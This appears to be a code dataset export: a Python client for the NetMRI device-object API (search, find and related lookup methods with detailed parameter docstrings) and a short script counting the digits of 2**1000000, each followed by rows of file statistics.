def search(self, **kwargs):
    """Lists the available device objects matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.

    **Inputs**

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
    :type DataSourceID: Array of Integer

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceCfgContextID: The internal NetMRI identifier of the Configuration context of declaration of this network object.
    :type DeviceCfgContextID: Array of Integer

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceID: The internal NetMRI identifier for the device to which this network object belongs.
    :type DeviceID: Array of Integer

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceObjectID: The internal NetMRI identifier for this network object.
    :type DeviceObjectID: Array of Integer

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjArtificialInd: Flag indicating this network object does not exist in the device configuration.
    :type ObjArtificialInd: Array of Boolean

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjChangedCols: The fields that changed between this revision of the record and the previous revision.
    :type ObjChangedCols: Array of String

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjConfigText: Original text of the definition of this network object in the device configuration.
    :type ObjConfigText: Array of String

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjEndTime: The ending effective time of this record, or empty if still in effect.
    :type ObjEndTime: Array of DateTime

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjFirstSeenTime: The timestamp of when NetMRI first discovered this network object.
    :type ObjFirstSeenTime: Array of DateTime

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjName: Name of this network object.
    :type ObjName: Array of String

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjProvisionData: Internal data - do not modify, may change without warning.
    :type ObjProvisionData: Array of String

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjStartTime: The starting effective time of this record.
    :type ObjStartTime: Array of DateTime

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjTimestamp: The date and time this record was collected or calculated.
    :type ObjTimestamp: Array of DateTime

    | ``api version min:`` 2.6
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param ObjUseCount: Total count of usage of this network by other elements of the configuration (rules, other network objects).
    :type ObjUseCount: Array of Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
    :type DeviceGroupID: Array of Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param timestamp: The data returned will represent the device objects as of this date and time. If omitted, the result will indicate the most recently collected data.
    :type timestamp: DateTime

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
    :type methods: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
    :type include: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0

    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000

    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` DeviceObjectID

    :param sort: The data field(s) to use for sorting the output. Default is DeviceObjectID. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData.
    :type sort: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc

    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param select: The list of attributes to return for each DeviceObject. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData. If empty or omitted, all attributes will be returned.
    :type select: Array

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param query: This value will be matched against device objects, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceCfgContextID, DeviceID, DeviceObjectID, ObjArtificialInd, ObjChangedCols, ObjConfigText, ObjEndTime, ObjFirstSeenTime, ObjName, ObjProvisionData, ObjStartTime, ObjTimestamp, ObjUseCount.
    :type query: String

    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return device_objects: An array of the DeviceObject objects that match the specified input criteria.
    :rtype device_objects: Array of DeviceObject
    """
    return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
    """Lists the available device objects matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceCfgContextID, DeviceID, DeviceObjectID, ObjArtificialInd, ObjChangedCols, ObjConfigText, ObjEndTime, ObjFirstSeenTime, ObjName, ObjProvisionData, ObjStartTime, ObjTimestamp, ObjUseCount.

    **Inputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_DataSourceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
    :type val_f_DataSourceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
    :type val_c_DataSourceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_DeviceCfgContextID: The operator to apply to the field DeviceCfgContextID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceCfgContextID: The internal NetMRI identifier of the Configuration context of declaration of this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_DeviceCfgContextID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_DeviceCfgContextID: If op_DeviceCfgContextID is specified, the field named in this input will be compared to the value in DeviceCfgContextID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceCfgContextID must be specified if op_DeviceCfgContextID is specified.
    :type val_f_DeviceCfgContextID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_DeviceCfgContextID: If op_DeviceCfgContextID is specified, this value will be compared to the value in DeviceCfgContextID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceCfgContextID must be specified if op_DeviceCfgContextID is specified.
    :type val_c_DeviceCfgContextID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device to which this network object belongs. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_DeviceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
    :type val_f_DeviceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
    :type val_c_DeviceID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_DeviceObjectID: The operator to apply to the field DeviceObjectID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceObjectID: The internal NetMRI identifier for this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_DeviceObjectID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_DeviceObjectID: If op_DeviceObjectID is specified, the field named in this input will be compared to the value in DeviceObjectID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceObjectID must be specified if op_DeviceObjectID is specified.
    :type val_f_DeviceObjectID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_DeviceObjectID: If op_DeviceObjectID is specified, this value will be compared to the value in DeviceObjectID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceObjectID must be specified if op_DeviceObjectID is specified.
    :type val_c_DeviceObjectID: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjArtificialInd: The operator to apply to the field ObjArtificialInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjArtificialInd: Flag indicating this network object does not exist in the device configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjArtificialInd: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjArtificialInd: If op_ObjArtificialInd is specified, the field named in this input will be compared to the value in ObjArtificialInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjArtificialInd must be specified if op_ObjArtificialInd is specified.
    :type val_f_ObjArtificialInd: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjArtificialInd: If op_ObjArtificialInd is specified, this value will be compared to the value in ObjArtificialInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjArtificialInd must be specified if op_ObjArtificialInd is specified.
    :type val_c_ObjArtificialInd: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjChangedCols: The operator to apply to the field ObjChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjChangedCols: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjChangedCols: If op_ObjChangedCols is specified, the field named in this input will be compared to the value in ObjChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjChangedCols must be specified if op_ObjChangedCols is specified.
    :type val_f_ObjChangedCols: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjChangedCols: If op_ObjChangedCols is specified, this value will be compared to the value in ObjChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjChangedCols must be specified if op_ObjChangedCols is specified.
    :type val_c_ObjChangedCols: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjConfigText: The operator to apply to the field ObjConfigText. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjConfigText: Original text of the definition of this network object in the device configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjConfigText: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjConfigText: If op_ObjConfigText is specified, the field named in this input will be compared to the value in ObjConfigText using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjConfigText must be specified if op_ObjConfigText is specified.
    :type val_f_ObjConfigText: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjConfigText: If op_ObjConfigText is specified, this value will be compared to the value in ObjConfigText using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjConfigText must be specified if op_ObjConfigText is specified.
    :type val_c_ObjConfigText: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjEndTime: The operator to apply to the field ObjEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjEndTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjEndTime: If op_ObjEndTime is specified, the field named in this input will be compared to the value in ObjEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjEndTime must be specified if op_ObjEndTime is specified.
    :type val_f_ObjEndTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjEndTime: If op_ObjEndTime is specified, this value will be compared to the value in ObjEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjEndTime must be specified if op_ObjEndTime is specified.
    :type val_c_ObjEndTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjFirstSeenTime: The operator to apply to the field ObjFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjFirstSeenTime: The timestamp of when NetMRI first discovered this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjFirstSeenTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjFirstSeenTime: If op_ObjFirstSeenTime is specified, the field named in this input will be compared to the value in ObjFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjFirstSeenTime must be specified if op_ObjFirstSeenTime is specified.
    :type val_f_ObjFirstSeenTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjFirstSeenTime: If op_ObjFirstSeenTime is specified, this value will be compared to the value in ObjFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjFirstSeenTime must be specified if op_ObjFirstSeenTime is specified.
    :type val_c_ObjFirstSeenTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjName: The operator to apply to the field ObjName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjName: Name of this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjName: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjName: If op_ObjName is specified, the field named in this input will be compared to the value in ObjName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjName must be specified if op_ObjName is specified.
    :type val_f_ObjName: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjName: If op_ObjName is specified, this value will be compared to the value in ObjName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjName must be specified if op_ObjName is specified.
    :type val_c_ObjName: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjProvisionData: The operator to apply to the field ObjProvisionData. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjProvisionData: Internal data - do not modify, may change without warning. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjProvisionData: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjProvisionData: If op_ObjProvisionData is specified, the field named in this input will be compared to the value in ObjProvisionData using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjProvisionData must be specified if op_ObjProvisionData is specified.
    :type val_f_ObjProvisionData: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjProvisionData: If op_ObjProvisionData is specified, this value will be compared to the value in ObjProvisionData using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjProvisionData must be specified if op_ObjProvisionData is specified.
    :type val_c_ObjProvisionData: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjStartTime: The operator to apply to the field ObjStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjStartTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjStartTime: If op_ObjStartTime is specified, the field named in this input will be compared to the value in ObjStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjStartTime must be specified if op_ObjStartTime is specified.
    :type val_f_ObjStartTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjStartTime: If op_ObjStartTime is specified, this value will be compared to the value in ObjStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjStartTime must be specified if op_ObjStartTime is specified.
    :type val_c_ObjStartTime: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjTimestamp: The operator to apply to the field ObjTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjTimestamp: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjTimestamp: If op_ObjTimestamp is specified, the field named in this input will be compared to the value in ObjTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjTimestamp must be specified if op_ObjTimestamp is specified.
    :type val_f_ObjTimestamp: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjTimestamp: If op_ObjTimestamp is specified, this value will be compared to the value in ObjTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjTimestamp must be specified if op_ObjTimestamp is specified.
    :type val_c_ObjTimestamp: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param op_ObjUseCount: The operator to apply to the field ObjUseCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjUseCount: Total count of usage of this network by other elements of the configuration (rules, other network objects). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_ObjUseCount: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_f_ObjUseCount: If op_ObjUseCount is specified, the field named in this input will be compared to the value in ObjUseCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjUseCount must be specified if op_ObjUseCount is specified.
    :type val_f_ObjUseCount: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param val_c_ObjUseCount: If op_ObjUseCount is specified, this value will be compared to the value in ObjUseCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjUseCount must be specified if op_ObjUseCount is specified.
    :type val_c_ObjUseCount: String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
    :type DeviceGroupID: Array of Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param timestamp: The data returned will represent the device objects as of this date and time. If omitted, the result will indicate the most recently collected data.
    :type timestamp: DateTime

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
    :type methods: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
    :type include: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0

    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000

    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` DeviceObjectID

    :param sort: The data field(s) to use for sorting the output. Default is DeviceObjectID. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData.
    :type sort: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc

    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param select: The list of attributes to return for each DeviceObject. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData. If empty or omitted, all attributes will be returned.
    :type select: Array

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String

    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return device_objects: An array of the DeviceObject objects that match the specified input criteria.
    :rtype device_objects: Array of DeviceObject
    """
    return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
    """Return the collector NetMRI (DataSource) that collected this data record.

    **Inputs**

    :param DeviceObjectID: The internal NetMRI identifier for this network object (required).
    :type DeviceObjectID: Integer

    **Outputs**

    :return: The collector NetMRI that collected this data record.
    :rtype: DataSource
    """
    # Resolve the fully qualified API method name, then issue the request.
    method_name = self._get_method_fullname("data_source")
    return self.api_request(method_name, kwargs)
def device_cfg_context(self, **kwargs):
    """Return the configuration context to which this network object belongs.

    **Inputs**

    :param DeviceObjectID: The internal NetMRI identifier for this network object (required).
    :type DeviceObjectID: Integer

    **Outputs**

    :return: The configuration context owning this network object.
    :rtype: DeviceCfgContext
    """
    # Resolve the fully qualified API method name, then issue the request.
    method_name = self._get_method_fullname("device_cfg_context")
    return self.api_request(method_name, kwargs)
def device(self, **kwargs):
    """Return the device from which this data was collected.

    **Inputs**

    :param DeviceObjectID: The internal NetMRI identifier for this network object (required).
    :type DeviceObjectID: Integer

    **Outputs**

    :return: The device from which this data was collected.
    :rtype: Device
    """
    # Resolve the fully qualified API method name, then issue the request.
    method_name = self._get_method_fullname("device")
    return self.api_request(method_name, kwargs)
def to_detail(self, **kwargs):
    """Return the rendered detail for an object.

    **Inputs**

    :param object_id: Identifier of the object to render (required).
    :type object_id: Integer

    :param view: Rendering mode: 0=tostring, 1=tooltip, 2=popup. Default is 0.
    :type view: Integer

    **Outputs**

    :return detail: The rendered detail text.
    :rtype detail: String
    """
    # Resolve the fully qualified API method name, then issue the request.
    method_name = self._get_method_fullname("to_detail")
    return self.api_request(method_name, kwargs)
| 53.400204
| 618
| 0.616259
| 6,340
| 52,439
| 5.042114
| 0.050158
| 0.069447
| 0.04514
| 0.05903
| 0.933619
| 0.932368
| 0.906122
| 0.892608
| 0.88094
| 0.873338
| 0
| 0.003197
| 0.302103
| 52,439
| 981
| 619
| 53.454638
| 0.87029
| 0.819981
| 0
| 0
| 0
| 0
| 0.06981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.421053
| false
| 0
| 0.052632
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
21d6c34b6830cfa0581ea49990016750c6f5c256
| 120
|
py
|
Python
|
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
# Calculando os digitos de 2 ** 1000000
import sys


def digit_count(value):
    """Return the number of decimal digits of the integer *value*.

    Python 3.11+ limits int -> str conversion to 4300 digits by default and
    raises ValueError beyond that; lift the limit so huge values (such as
    2 ** 1000000, ~301k digits) can still be converted.
    """
    if hasattr(sys, "set_int_max_str_digits"):
        sys.set_int_max_str_digits(0)  # 0 disables the conversion length limit
    return len(str(value))


if __name__ == "__main__":
    print("Na elevação de 2 ** 1000000, existem ", digit_count(2 ** 1000000), "digitos")
| 30
| 78
| 0.683333
| 18
| 120
| 4.555556
| 0.666667
| 0.292683
| 0.243902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 0.15
| 120
| 3
| 79
| 40
| 0.568627
| 0.308333
